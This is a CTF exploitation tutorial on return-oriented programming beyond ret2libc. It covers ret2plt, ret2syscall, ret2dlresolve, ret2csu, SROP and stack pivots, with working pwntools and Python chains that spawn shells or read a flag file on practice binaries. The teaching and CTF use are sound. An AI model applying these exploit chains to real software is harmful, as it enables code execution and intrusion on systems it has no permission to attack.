ROP Beyond ret2libc: The Gadget Ladder for CTF Exploitation

Every ROP tutorial is lying by omission

You found the overflow. You wrote the offset into a pwntools script. You sent p64(pop_rdi) + p64(binsh) + p64(system) and the program handed back a shell. Great. Now try it on a binary that was statically linked, or one with Full RELRO (Relocation Read-Only), or one where there is no puts you can call to leak libc. The payload that worked a minute ago crashes with SIGSEGV before the first gadget fires.

Most ROP (Return-Oriented Programming) tutorials teach ret2libc and stop. That gets beginners to their first shell and leaves them stranded the moment the binary does anything unusual. ret2libc is one dialect. There are five more on the shelf, and each one is the only move that works in a specific, common situation.

ROP is not an exploit. It's a programming language. The question is always: what is in scope as the instruction set?

This guide is the companion to the ASLR and PIE Bypass post (ASLR is Address Space Layout Randomization, PIE is Position-Independent Executable, both covered there in depth). That post assumes you have a leak and builds ret2libc on top of it. This post picks up where leaks end. You get five rungs, each with a working pwntools skeleton, the exact precondition that makes it legal, and at least one real Capture-The-Flag (CTF) writeup where it was the winning move. If you already understand stack buffer overflows, start here. If you do not, read the Buffer Overflow guide first.

Note: ret2libc does not disappear when you climb the ladder. It is still the default the second a leak is viable. These techniques are what you reach for when the leak is not there, or when pwntools reports "no such gadget" for the argument register you need. In real exploits the rungs compose, and a single chain often borrows from two of them.

The Gadget Ladder: five rungs you can climb or stack together

The decision tree is driven by what the binary gives you, not by which technique is cleanest. Read the ladder from rung 0 upward: start with the cheapest move that the target allows. If the preconditions fail, climb a rung.

Rung	Technique	Use when	Blocked by	Receipt
0	ret2libc	You have or can obtain a libc leak	ASLR with no leak path (Full RELRO alone does not block it)	ASLR and PIE Bypass (sibling post)
1	ret2plt	The symbol you need (e.g. system, execve) is already imported and in the PLT	Target symbol not imported	Classic ret2libc variants; any binary that imports system
2	ret2syscall	Static binary, or any binary with a syscall gadget, and x86_64 syscall ABI is in scope	seccomp filters; binary lacks a syscall instruction
3	ret2dlresolve	Dynamically linked, Partial or No RELRO, known writable region	Full RELRO; PIE without a text leak
4	ret2csu	Dynamically linked glibc binary, you are missing rdx or rsi control mid-chain	Binary has no __libc_csu_init (musl, glibc 2.34 and later, some LTO builds)
5	SROP	Gadget set is minimal; you have a syscall;ret and a way to set rax=15	vsyscall disabled plus no libc plus no other syscall gadget
+	Stack pivot	Overflow gives you too few bytes for a full chain	No writable region you can predict the address of

The rungs are not mutually exclusive. A common combination is ret2csu (to load the argument registers a chain cannot otherwise reach) chained into ret2syscall (to actually execute execve). Treat the ladder as a vocabulary, not a decision flowchart.

Key insight: Return-oriented programming was first formalized by Hovav Shacham in 2007 as a way to achieve Turing-complete computation using only ret-terminated gadgets already present in a target binary (Shacham, CCS 2007). Every technique below is an answer to the same question: which gadgets are in scope today, and which language do they let me write in?

Rung 0: ret2libc is only one dialect

ret2libc is covered in depth in the ASLR and PIE Bypass guide, so this section is a quick recap so the rest of the ladder has a baseline to stand on.

The shape is fixed. Find the stack offset, leak libc (via puts(puts@got), a format string, or any primitive that reveals a libc address), compute the libc base, and call system("/bin/sh") via a three-gadget chain:

from pwn import *
elf  = context.binary = ELF('./vuln')
libc = ELF('./libc.so.6')
OFFSET = 40                            # PLACEHOLDER: bytes to the saved rip (find with cyclic)
# 1) leak libc (see sibling post for how to pick a leak)
io  = elf.process()
rop = ROP(elf)
rop.puts(elf.got['puts'])              # print the resolved address of puts
rop.call(elf.symbols['main'])          # return to main for a second overflow
io.sendline(b'A'*OFFSET + rop.chain())
# consume any banner or prompt output before this line, or the leak will be garbage
leaked = u64(io.recvline(keepends=False).ljust(8, b'\x00'))
libc.address = leaked - libc.symbols['puts']
# 2) extra ret for alignment, then pop rdi ; ret loads '/bin/sh' and system runs
rop2 = ROP(libc)
rop2.raw(rop2.find_gadget(['ret'])[0])
rop2.call(libc.symbols['system'], [next(libc.search(b'/bin/sh'))])
io.sendline(b'A'*OFFSET + rop2.chain())
io.interactive()
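The subtraction in step 1 is where a lot of ret2libc attempts quietly go wrong (a stray byte in the leak, or the wrong libc file). The following is a minimal stdlib-only sketch of the same arithmetic with a page-alignment sanity check. The helper name, the leaked address, and the puts offset are all made up for illustration and do not come from any real libc.

```python
import struct

PAGE_MASK = 0xFFF  # shared objects are mapped on 4 KiB page boundaries


def libc_base_from_leak(leak_bytes: bytes, symbol_offset: int) -> int:
    """Convert the raw bytes printed by puts(puts@got) into a libc base."""
    # puts stops at the first NUL byte, so a 6-byte leak is normal on x86_64;
    # pad back to 8 bytes before unpacking as a little-endian integer.
    leaked = struct.unpack("<Q", leak_bytes.ljust(8, b"\x00"))[0]
    base = leaked - symbol_offset
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page-aligned: wrong libc or bad leak")
    return base


# HYPOTHETICAL numbers, for illustration only.
FAKE_PUTS_OFFSET = 0x80E20
fake_leak = (0x7FFFF7E5EE20).to_bytes(6, "little")
print(hex(libc_base_from_leak(fake_leak, FAKE_PUTS_OFFSET)))
```

If the check raises, stop and re-examine the leak before building the second stage. A base that is not page-aligned will never produce a working system address.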

Two things to remember as you climb. First, ret2libc is the only rung that strictly requires an external-library leak. Every rung above this one avoids libc entirely, works with a partial leak, or forges its own addresses. Second, the 64-bit stack alignment trap (the movaps crash that eats so many otherwise-correct exploits) applies to every rung above it too. If a chain dies inside do_system or right after a call, add an extra ret gadget.

Tip: Once libc is rebased, before you build a system("/bin/sh") chain, run one_gadget ./libc.so.6. It often returns a single address that drops a shell if one of a few register constraints holds (commonly [rsp+0x30] == NULL, or rax == NULL). One gadget instead of a three-gadget chain means no alignment worries and no argument setup. When it fits, it is the cleanest exit from the whole ladder.

Rung 1: ret2plt skips the whole problem if the symbol is already imported

Before you forge anything, check what the binary already imported. Every dynamically linked ELF (Executable and Linkable Format) binary ships a Procedure Linkage Table (PLT) stub for every libc function it calls. In a non-PIE binary, puts@plt, read@plt, and printf@plt all sit at fixed addresses inside the binary's own executable segment. If the binary imported system, execve, or anything equivalent, you can call it straight from the PLT with no libc address at all.

$ objdump -d ./vuln | grep -E 'plt>:' | head -20
0000000000401040 <puts@plt>:
0000000000401050 <printf@plt>:
0000000000401060 <read@plt>:
0000000000401070 <system@plt>:     # system is imported, reachable with no leak

With system@plt available, the chain is trivial: pop the address of a "/bin/sh" string into rdi, then call system@plt. No leak, no forge.

rop = ROP(elf)
rop.raw(rop.find_gadget(['ret'])[0])   # alignment
rop.system(next(elf.search(b'/bin/sh')))
# or, if '/bin/sh' is not in the binary, write it to .bss first via read@plt

The catch: binaries compiled for CTFs almost never import system unless the author wants you to find it. You are looking for execve, gets, or a helpful wrapper the author wrote. Grep the PLT first. If nothing useful is there, climb.

Rung 2: ret2syscall is the first thing to try on a static binary

Static binaries do not have a PLT or a libc to leak. What they do have is every function they call, compiled directly into the executable, along with the glibc syscall wrappers those functions depend on. That means they almost certainly contain a syscall instruction and a complete set of argument-register pop gadgets. ret2syscall skips the dynamic loader entirely and executes execve("/bin/sh", 0, 0) via a raw syscall.

The x86_64 syscall Application Binary Interface (ABI) is the contract you program against:

rax = syscall number      (59 = execve, 0 = read, 1 = write, 2 = open)
rdi = arg1                (pathname for execve)
rsi = arg2                (argv)
rdx = arg3                (envp)
r10 = arg4                (note: r10, not rcx)
r8  = arg5
r9  = arg6

Find the gadgets with ROPgadget, stash /bin/sh somewhere you can predict (the .bss or .data section in a non-PIE static binary), and build the chain:

$ ROPgadget --binary ./vuln --only 'pop|ret' | grep -E 'rax|rdi|rsi|rdx'
0x00000000004017f7 : pop rax ; ret
0x0000000000401c87 : pop rdi ; ret
0x000000000040a6ae : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
$ ROPgadget --binary ./vuln --only 'syscall|ret'
0x00000000004011cc : syscall ; ret

from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
pop_rax     = 0x4017f7
pop_rdi     = 0x401c87
pop_rsi     = 0x40a6ae
pop_rdx     = 0x4498b5
syscall_ret = 0x4011cc
binsh_addr  = elf.bss() + 0x100         # safe scratch in .bss
OFFSET      = 40                        # PLACEHOLDER: bytes to the saved rip (find with cyclic)
rop  = flat(
    # stage 1: read '/bin/sh\0' into .bss
    pop_rax, 0,                         # rax = 0 (read)
    pop_rdi, 0,                         # rdi = stdin
    pop_rsi, binsh_addr,                # rsi = dest
    pop_rdx, 8,                         # rdx = 8 bytes
    syscall_ret,
    # stage 2: execve(binsh_addr, 0, 0)
    pop_rax, 59,                        # rax = execve
    pop_rdi, binsh_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    syscall_ret,
)
io = elf.process()
io.sendline(b'A' * OFFSET + rop)
io.sendline(b'/bin/sh\x00')
io.interactive()

Warning: If seccomp is enabled, execve may be banned. Check with seccomp-tools: seccomp-tools dump ./vuln. If the binary filters execve, switch to an open plus read plus write chain and exfiltrate the flag file directly.
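The open plus read plus write fallback is the same ret2syscall pattern repeated four times. Here is a minimal sketch using only the standard library (struct stands in for pwntools' p64 so the block runs anywhere). The gadget addresses reuse the illustrative ROPgadget output above, the helper names are invented for this example, and the descriptor number 3 is an assumption that holds only if the process has no other files open.

```python
import struct


def p64(value: int) -> bytes:
    """Pack one 64-bit little-endian stack slot (stand-in for pwntools p64)."""
    return struct.pack("<Q", value)


# Illustrative gadget addresses; yours will differ.
POP_RAX, POP_RDI, POP_RSI, POP_RDX = 0x4017F7, 0x401C87, 0x40A6AE, 0x4498B5
SYSCALL_RET = 0x4011CC


def syscall(nr: int, rdi: int = 0, rsi: int = 0, rdx: int = 0) -> bytes:
    """One syscall's worth of chain: load rax, rdi, rsi, rdx, then syscall ; ret."""
    slots = (POP_RAX, nr, POP_RDI, rdi, POP_RSI, rsi, POP_RDX, rdx, SYSCALL_RET)
    return b"".join(p64(s) for s in slots)


def orw_chain(path_addr: int, buf_addr: int, path_len: int, flag_len: int = 0x40) -> bytes:
    assumed_fd = 3  # ASSUMPTION: first free descriptor after stdin, stdout, stderr
    return (
        syscall(0, 0, path_addr, path_len)             # read(0, path_addr, n): stage the path
        + syscall(2, path_addr, 0, 0)                  # open(path_addr, O_RDONLY, 0)
        + syscall(0, assumed_fd, buf_addr, flag_len)   # read(fd, buf_addr, flag_len)
        + syscall(1, 1, buf_addr, flag_len)            # write(1, buf_addr, flag_len)
    )


chain = orw_chain(path_addr=0x4C0100, buf_addr=0x4C0200, path_len=9)
print(len(chain), "bytes of chain")
```

After sending the chain, send the NUL-terminated path (for example b"flag.txt\x00", nine bytes) so the first read stages it. If the filter also bans open, the same shape works with whichever file-opening syscall the seccomp-tools dump shows as allowed.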

Rung 3: ret2dlresolve forges a symbol table out of thin air

The dynamic linker is a program that runs inside your process. Its job, when puts@plt gets called for the first time, is to walk the relocation table, look up the symbol name in the string table, resolve it to a libc address, and patch the GOT. That whole process is triggered by a single call into _dl_runtime_resolve with a relocation index on the stack.

The attack traces back to Nergal's Phrack 58:4 (December 2001), which mapped the dynamic linker as an attack surface. The variant shown here forges the relocation entry itself. You write a fake Elf64_Rela, a fake Elf64_Sym, and the string "system" into a writable region at a known address, then enter the resolver with an index that points at your forgery. The linker resolves system, jumps to it, and runs it with the argument you chose. No leak needed, and no pre-resolved entry in the Global Offset Table (GOT) required.

pwntools does the forge for you:

from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
OFFSET = 40                                # PLACEHOLDER: bytes to the saved rip (find with cyclic)
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw(rop.find_gadget(['ret'])[0])       # 64-bit alignment
rop.read(0, dlresolve.data_addr)           # stash the forged structs
rop.ret2dlresolve(dlresolve)               # trigger the linker
io = elf.process()
io.sendline(b'A'*OFFSET + rop.chain())
io.sendline(dlresolve.payload)             # the actual forgery
io.interactive()

Warning: ret2dlresolve is blocked by Full RELRO: every symbol is bound at load time and the GOT is then remapped read-only, so there is no lazy-binding path left to hijack. It also needs a writable region at a known address, which means no PIE (or a separate text-base leak). Check with checksec before you commit to this rung.

The x86_64 version has teeth. _dl_fixup takes the high 32 bits of r_info as the symbol index, then reads SYMTAB + index * sizeof(Elf64_Sym) (where sizeof(Elf64_Sym) = 0x18) as an Elf64_Sym, so your forged symbol must sit a whole multiple of 0x18 bytes away from SYMTAB. It also reads the 16-bit entry vernum[r_info >> 32] as a version index, and with a large symbol index that read is easy to trip out of bounds. Choose the forgery address so both lookups land somewhere sane: the index falls exactly on your forged symbol entry, and the vernum entry it selects is mapped and holds a valid version index (0 passes the check).
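The index arithmetic is easier to trust once you have done it by hand. Below is a minimal stdlib-only sketch of what a forgery has to compute. Every address is a hypothetical placeholder (in a real target you would read SYMTAB, STRTAB, JMPREL, and VERSYM out of the .dynamic section), the function names are invented for this example, and pwntools' Ret2dlresolvePayload remains the practical tool.

```python
import struct

SYM_SIZE = 0x18           # sizeof(Elf64_Sym)
RELA_SIZE = 0x18          # sizeof(Elf64_Rela)
R_X86_64_JUMP_SLOT = 7    # relocation type the resolver expects


def align_from(base: int, addr: int, size: int) -> int:
    """Round addr up so that (addr - base) is a whole multiple of size."""
    return addr + (-(addr - base)) % size


def forge_dlresolve(symtab, strtab, jmprel, versym, data_addr, got_slot,
                    name=b"system\x00"):
    name_addr = data_addr
    sym_addr = align_from(symtab, name_addr + len(name), SYM_SIZE)
    rela_addr = align_from(jmprel, sym_addr + SYM_SIZE, RELA_SIZE)
    sym_index = (sym_addr - symtab) // SYM_SIZE

    # Elf64_Sym: st_name(u32) st_info(u8) st_other(u8) st_shndx(u16) st_value(u64) st_size(u64)
    # st_info 0x12 = global function; st_other 0 keeps the normal lookup path.
    fake_sym = struct.pack("<IBBHQQ", name_addr - strtab, 0x12, 0, 0, 0, 0)
    # Elf64_Rela: r_offset(u64) r_info(u64) r_addend(i64)
    r_info = (sym_index << 32) | R_X86_64_JUMP_SLOT
    fake_rela = struct.pack("<QQq", got_slot, r_info, 0)

    blob = name.ljust(sym_addr - data_addr, b"\x00") + fake_sym
    blob = blob.ljust(rela_addr - data_addr, b"\x00") + fake_rela
    return {
        "blob": blob,                                     # bytes to write at data_addr
        "sym_index": sym_index,
        "reloc_index": (rela_addr - jmprel) // RELA_SIZE, # value the resolver is entered with
        "versym_entry_addr": versym + 2 * sym_index,      # must be mapped and hold a valid index
    }


# HYPOTHETICAL layout of a small non-PIE binary.
forged = forge_dlresolve(symtab=0x4003C8, strtab=0x400488, jmprel=0x400598,
                         versym=0x400510, data_addr=0x404E00, got_slot=0x404F00)
print({k: hex(v) for k, v in forged.items() if k != "blob"})
```

The value to inspect before firing is versym_entry_addr. If that address is unmapped in the target, the resolver crashes before it ever looks at your forged symbol, and you need a different data_addr.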

Rung 4: ret2csu is a universal 3-argument call shipped in every glibc binary

You are mid-chain and you need to set rdx, but ROPgadget shows no pop rdx ; ret anywhere in the binary. Before you give up and hunt for a libc leak, look at __libc_csu_init. It is the init routine that glibc (before version 2.34) links into every dynamically linked binary. It runs before main. It contains two gadgets that together let you control edi, rsi, and rdx, and make an indirect call.

Disassemble __libc_csu_init and you will find something like:

# Gadget A (the 'popper') at the epilogue of __libc_csu_init
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
# Gadget B (the 'caller') earlier in __libc_csu_init
mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword ptr [r12 + rbx*8]
add rbx, 1
cmp rbp, rbx
jnz <loop back to caller>
add rsp, 8
; no ret here: execution falls through into gadget A (six pops, then ret)

Gadget A puts six values from the stack into six registers. Gadget B moves r15 -> rdx, r14 -> rsi, r13 -> edi, and calls whatever function pointer lives at [r12 + rbx*8]. Set rbp = rbx + 1 so the loop exits after one iteration. Point r12 at a GOT entry or a .dynamic slot that contains a valid function pointer (a pointer to _init works in most stripped binaries). You now have three-argument control without a single pop rdx anywhere, with one limit: mov edi, r13d keeps only the low 32 bits of the first argument.

ret2csu turns any dynamically linked glibc binary into a three-argument calling machine, even if it was compiled as Hello World.

Worked pwntools template for ROP Emporium ret2csu:

from pwn import *
elf = context.binary = ELF('./ret2csu')
popper = 0x40089a    # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
caller = 0x400880    # mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]
init_ptr = 0x600e38  # points to _init, survives as a valid call target
win      = 0x4007b1  # the function you want to reach
OFFSET   = 40        # PLACEHOLDER: bytes to the saved rip (find with cyclic)
rop = flat(
    popper,
    0,                    # rbx    (so [r12 + 0*8] is the call target)
    1,                    # rbp    (equal to rbx+1, loop exits)
    init_ptr,             # r12    (function pointer source)
    0xf,                  # r13    -> edi
    0xf,                  # r14    -> rsi
    0xdeadcafebabeb00f,   # r15    -> rdx (16 hex digits, fits u64)
    caller,
    0,                    # padding for 'add rsp, 8' at end of caller
    0, 0, 0, 0, 0, 0,     # six pops when caller falls through into popper
    win,
)
io = elf.process()
io.sendline(b'A' * OFFSET + rop)
io.interactive()
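The template generalizes into a small helper. This is a stdlib-only sketch (struct instead of pwntools' flat) that assumes the register mapping in the disassembly above, namely r13 -> edi, r14 -> rsi, r15 -> rdx. Some builds swap r13 and r15, so check your own disassembly first. The function name csu_call is invented for this example.

```python
import struct


def csu_call(popper: int, caller: int, fn_ptr_slot: int,
             edi: int, rsi: int, rdx: int, then: int) -> bytes:
    """Build one ret2csu round: call *fn_ptr_slot with (edi, rsi, rdx), then return to `then`."""
    if not 0 <= edi < 2**32:
        raise ValueError("gadget B does 'mov edi, r13d': only 32 bits of arg1 survive")
    rbx, rbp = 0, 1  # rbp == rbx + 1 makes the loop exit after a single call
    slots = [
        popper,
        rbx, rbp, fn_ptr_slot,   # rbx, rbp, r12 (call target is read from [r12 + rbx*8])
        edi, rsi, rdx,           # r13, r14, r15 under the assumed mapping
        caller,
        0,                       # consumed by 'add rsp, 8'
        0, 0, 0, 0, 0, 0,        # consumed by the six pops on the way out
        then,                    # final ret lands here with rsi and rdx still set
    ]
    return b"".join(struct.pack("<Q", s) for s in slots)


# Same illustrative values as the template above.
payload = csu_call(popper=0x40089A, caller=0x400880, fn_ptr_slot=0x600E38,
                   edi=0xF, rsi=0xF, rdx=0xDEADCAFEBABEB00F, then=0x4007B1)
print(len(payload), "bytes")
```

The 32-bit check is the part worth keeping. If the target function needs a full 64-bit first argument, follow the ret2csu round with a separate pop rdi ; ret before the final call.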

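Warning: __libc_csu_init comes from glibc's startup code, not from the compiler. Binaries linked against musl, or against glibc 2.34 and later (which dropped it from newly linked programs), do not contain these gadgets, and some link-time-optimized builds omit them as well. Even where they exist, the register order in gadget B varies between builds. Always disassemble and confirm the gadgets exist before you commit. HackTricks documents several variant sequences at hacktricks.wiki/...ret2csu.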

ret2csu is almost never a primary strategy. It is the move you make when the rest of your chain works except for one argument register: you are missing rdx or rsi control and no other gadget sets them.

Rung 5: SROP sets every register at once with a fake signal frame

When a Unix signal arrives, the kernel pushes a signal frame (a ucontext_t holding the saved registers) onto the stack and runs the handler. When the handler returns, a small trampoline calls rt_sigreturn. That syscall reads the saved context back off the stack and restores every general-purpose register, rip, rsp, and the flags. The kernel does not verify the frame; it trusts what the stack says.

Sigreturn-Oriented Programming, introduced by Bosman and Bos at IEEE S&P 2014, weaponizes that trust. You forge a signal frame on the stack and fire rt_sigreturn (syscall number 15 on x86_64, 119 on i386 as the older sigreturn). The kernel obediently loads every register from your forgery. One payload, arbitrary register state. The authors put it plainly:

"anyone who controls the stack is able to set up such a signal frame." (Bosman & Bos, 2014)

The minimum gadget budget is tiny: a syscall ; ret and a way to put 15 into rax. That is it. pwntools has a SigreturnFrame class that handles the uc_mcontext layout for you:

from pwn import *
context.arch = 'amd64'
elf = context.binary = ELF('./vuln')
syscall_ret = 0x401234      # PLACEHOLDER: a 'syscall ; ret' gadget
pop_rax     = 0x401100      # PLACEHOLDER: a 'pop rax ; ret' gadget
binsh       = 0x601040      # PLACEHOLDER: '/bin/sh' address in .bss
                            # find yours with ROPgadget and objdump
OFFSET      = 40            # PLACEHOLDER: bytes to the saved rip (find with cyclic)
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret
frame.rsp = elf.bss() + 0x400   # MUST point to writable memory; a bad rsp
                                # will not trip sigreturn but will crash
                                # the next push or movaps
rop = flat(
    pop_rax, 15,             # rax = rt_sigreturn
    syscall_ret,             # invoke rt_sigreturn
    bytes(frame),            # the fake signal frame the kernel will restore
)
io = elf.process()
io.sendline(b'A' * OFFSET + rop)
io.interactive()
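It helps to see what SigreturnFrame is actually laying out. The sketch below rebuilds the amd64 frame with nothing but struct, following the 31-slot, 248-byte order that, to the best of my knowledge, pwntools uses. The slot names and the sigreturn_frame helper are illustrative, and the addresses are the same placeholders as above.

```python
import struct

# Slot order of the amd64 signal frame, 8 bytes per slot.
AMD64_FRAME_SLOTS = [
    "uc_flags", "&uc", "uc_stack.ss_sp", "uc_stack.ss_flags", "uc_stack.ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2", "&fpstate",
    "__reserved", "sigmask",
]


def sigreturn_frame(**regs: int) -> bytes:
    """Pack a fake frame; every slot not named in regs is zero."""
    values = dict.fromkeys(AMD64_FRAME_SLOTS, 0)
    values["csgsfs"] = 0x33  # cs = 0x33 is the 64-bit user code segment
    for name, value in regs.items():
        if name not in values:
            raise KeyError(f"unknown frame slot: {name}")
        values[name] = value
    return b"".join(struct.pack("<Q", values[slot]) for slot in AMD64_FRAME_SLOTS)


# PLACEHOLDER addresses, matching the pwntools example above.
frame_bytes = sigreturn_frame(rax=59, rdi=0x601040, rsi=0, rdx=0,
                              rip=0x401234, rsp=0x601400)
print(len(frame_bytes), "byte frame, rax slot at offset",
      hex(AMD64_FRAME_SLOTS.index("rax") * 8))
```

Knowing the offsets pays off when the frame has to dodge bad bytes or when only part of it fits in the overflow: you can see exactly which slots the chain depends on and which can hold anything.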

SROP shines on static binaries, unusual architectures, and challenges where gadget sets are deliberately minimal. A single sigreturn frame trivializes an architecture you have never exploited before: instead of hunting for dozens of gadgets you need only one syscall ; ret and a way to set rax = 15. Reach for it when the gadget set is so thin that even ret2csu runs out of levers.

Escape hatch: stack pivoting when the buffer is too small

Sometimes the overflow gives you only sixteen bytes of control, starting at the saved rip. That is one gadget and one address, which is enough to redirect execution but not enough to run a chain. The fix is a stack pivot: use the little room you have to move rsp to somewhere larger (a buffer under your control, the .bss into which you staged bytes earlier, or the heap) and then run the real chain from there.

The common pivots, in order of how often they show up in writeups:

leave ; ret                   # rsp = rbp; pop rbp; ret  (if you control rbp)
pop rsp ; ret                 # straightforward if this gadget exists
xchg rax, rsp ; ret           # pivot via rax, classic on 32-bit
add rsp, <offset> ; ret       # when you already have a big overflow window
mov rsp, r13 ; ret            # rare but useful when r13 lands in .bss
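The leave ; ret pivot is the one most worth working through by hand, because it needs only the saved rbp and the saved rip. A minimal stdlib-only sketch, assuming the vulnerable function ends with its own leave ; ret (so the forged saved rbp is loaded into rbp before the gadget runs) and that the real chain was already staged at a known address. All addresses and helper names are hypothetical.

```python
import struct


def p64(value: int) -> bytes:
    """Pack one 64-bit little-endian stack slot (stand-in for pwntools p64)."""
    return struct.pack("<Q", value)


def leave_ret_pivot(pad_to_saved_rbp: int, staged_addr: int, leave_ret: int) -> bytes:
    """First-stage overflow: forged saved rbp, then saved rip = leave ; ret gadget."""
    return b"A" * pad_to_saved_rbp + p64(staged_addr) + p64(leave_ret)


def staged_chain(chain_slots, next_rbp: int = 0) -> bytes:
    """Bytes to place at staged_addr before triggering the pivot."""
    # The gadget's 'leave' sets rsp = staged_addr and pops the first slot into rbp;
    # its 'ret' then jumps to the second slot, so the real chain starts 8 bytes in.
    return p64(next_rbp) + b"".join(p64(s) for s in chain_slots)


# HYPOTHETICAL addresses for illustration.
STAGED = 0x404800
first_stage = leave_ret_pivot(pad_to_saved_rbp=32, staged_addr=STAGED, leave_ret=0x401156)
second_stage = staged_chain([0x401C87, 0x404900, 0x401040])
print(len(first_stage), len(second_stage))
```

Leave some slack below the staged chain as well. Functions called from the pivoted stack push their own frames downward from the new rsp, so a staging address at the very start of a writable page tends to crash on the first call.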

For a picoCTF example on this site, picoCTF 2025 handoff combines a sub rsp, 0x2e8 ; jmp rsp pivot with shellcode to escape a tightly constrained input.

The three things that kill these chains

When a ROP chain looks correct and still does not work, the technique is almost never to blame. The usual causes, in decreasing order of how often they bite:

1. Stack alignment

The System V x86_64 ABI requires rsp to be 16-byte aligned at a call instruction. glibc's system hits a movaps that crashes on a misaligned stack. Fix: insert one extra ret gadget before the call.
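The alignment rule reduces to parity arithmetic on chain slots. Here is a minimal sketch under two assumptions: the saved rip slot sits at an address that is 8 mod 16 (true when the vulnerable function was reached by an ordinary ABI-compliant call), and every gadget before the function is a plain pop/ret sequence that consumes only its own slots. The helper names are made up for this example.

```python
def rsp_mod16_on_entry(slot_index: int, saved_rip_mod16: int = 8) -> int:
    """rsp % 16 at the first instruction of the function stored in chain slot slot_index."""
    # The 'ret' that pops slot i leaves rsp pointing at slot i + 1.
    return (saved_rip_mod16 + 8 * (slot_index + 1)) % 16


def needs_extra_ret(slot_index: int) -> bool:
    """A normally called function is entered with rsp % 16 == 8; anything else risks movaps."""
    return rsp_mod16_on_entry(slot_index) != 8


# Chain [pop_rdi, binsh, system]: system sits in slot 2.
print(needs_extra_ret(2))
# Chain [ret, pop_rdi, binsh, system]: system moves to slot 3.
print(needs_extra_ret(3))
```

Under those assumptions a function address in an odd-numbered slot is aligned and one in an even-numbered slot is not, which is why a single ret (one extra slot) is always enough to fix it.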

2. Bad bytes

If the vuln is gets, a 0x0a byte in your chain truncates it. If it is strcpy, a 0x00 byte kills it. If a gadget address contains the forbidden byte, pick a different gadget.
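Checking for bad bytes is mechanical, so let a script do it before you send anything. A minimal stdlib-only sketch follows; the function name and the sample addresses are invented for illustration.

```python
import struct


def bad_byte_hits(payload: bytes, bad: bytes, word_size: int = 8):
    """Return (byte_offset, slot_index, byte_value) for every forbidden byte in payload."""
    return [(i, i // word_size, b) for i, b in enumerate(payload) if b in bad]


# HYPOTHETICAL chain: the first gadget address contains 0x0a, fatal for gets().
chain = struct.pack("<3Q", 0x40100A, 0x4141414141414141, 0x401C87)
for offset, slot, value in bad_byte_hits(chain, bad=b"\n"):
    print(f"slot {slot} (offset {offset}) contains {value:#04x}")
```

The slot index tells you which gadget or constant to swap. For strcpy-style bugs pass bad=b"\x00" and expect hits in the upper bytes of every 64-bit address, which is why those overflows usually carry only one address at the very end of the payload.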

3. Wrong gadget semantics

ROPgadget shows a line, not an invariant. A pop rdi ; pop r15 ; ret is not the same as a pop rdi ; ret. A gadget that touches rax may break your return value assumption. Single-step every gadget in GDB until the chain is dead or alive.

The GDB CTF Guide and the Python for CTF post cover the step-by-step workflow. The short version: run your chain under gdb ./vuln with set follow-fork-mode child, set a breakpoint on the first gadget, and step one instruction at a time through every pop and ret until the crash is obvious. Do not guess. Watch the registers.

picoCTF challenges where you'll actually climb

picoCTF leans on ret2win, ret2libc, and shellcode more than on the higher rungs of the ladder. But a few challenges in the 2022 through 2025 events do push you off ret2libc:

picoCTF 2022 ropfu has no win function and expects a syscall-style ROP chain against a 32-bit binary. Closest picoCTF has come to a pure ret2syscall.
picoCTF 2025 handoff forces a stack pivot into shellcode because the initial overflow window is too small for a full chain.
picoCTF 2024 format string 3 and picoCTF 2025 PIE TIME 2 are the best practice for the leak half of the problem, which is what the ladder avoids. Do them so you understand why each rung exists.

For deeper practice outside picoCTF, work through ROP Emporium. The challenges ret2csu, pivot, and fluff each isolate one rung of the ladder and give you a predictable target to break it on.

Quick reference

Decision order when you have no leak

1. checksec ./vuln. Note RELRO, PIE, NX (No-eXecute stack), canary, static vs dynamic.
2. objdump -d ./vuln | grep @plt. If system, execve, or a helpful wrapper is imported, use ret2plt.
3. Static binary or syscall;ret gadget present? Use ret2syscall.
4. Dynamic with Partial or No RELRO and a writable region at a known address? Use ret2dlresolve.
5. Missing rdx or rsi control mid-chain? Splice in ret2csu.
6. Minimal gadget set or exotic arch with a syscall;ret available? Use SROP.
7. Buffer too small for the chain you need? Stack pivot to the .bss, heap, or a read-staged area.
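The decision order above can be written down as a small function, which is a useful way to check that you have actually gathered every fact it depends on. This is only a sketch: the dictionary keys are hypothetical names for what checksec, objdump, and ROPgadget tell you, and real targets often need judgment that a lookup like this cannot capture.

```python
def pick_moves(target: dict) -> list:
    """Map facts about a binary to the rungs worth trying, in the order listed above."""
    t = target.get
    moves = []
    if t("useful_plt_symbol"):                     # system, execve, or a helpful wrapper
        moves.append("ret2plt")
    elif t("syscall_ret") and t("arg_pops"):       # pop rax/rdi/rsi/rdx all present
        moves.append("ret2syscall")
    elif t("dynamic") and t("relro") in ("none", "partial") and t("known_writable"):
        moves.append("ret2dlresolve")
    elif t("syscall_ret") and t("can_set_rax"):    # thin gadget set, but rax = 15 is reachable
        moves.append("SROP")
    else:
        moves.append("no rung fits: look for a leak")
    # The last two entries are add-ons that combine with whichever rung was picked.
    if t("missing_rdx_or_rsi") and t("has_csu_init"):
        moves.append("splice in ret2csu")
    if t("overflow_too_small"):
        moves.append("stack pivot first")
    return moves


static_target = {"syscall_ret": True, "arg_pops": True}
tiny_target = {"syscall_ret": True, "can_set_rax": True, "overflow_too_small": True}
print(pick_moves(static_target))
print(pick_moves(tiny_target))
```

Filling in the dictionary by hand for a binary you have not solved is the "name the rung before you open a browser" exercise in miniature.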

pwntools cheat sheet

# Auto-build a ret2libc chain once libc is rebased
rop = ROP([elf, libc]); rop.system(next(libc.search(b'/bin/sh')))
# Auto-build a ret2dlresolve forgery
dlr = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
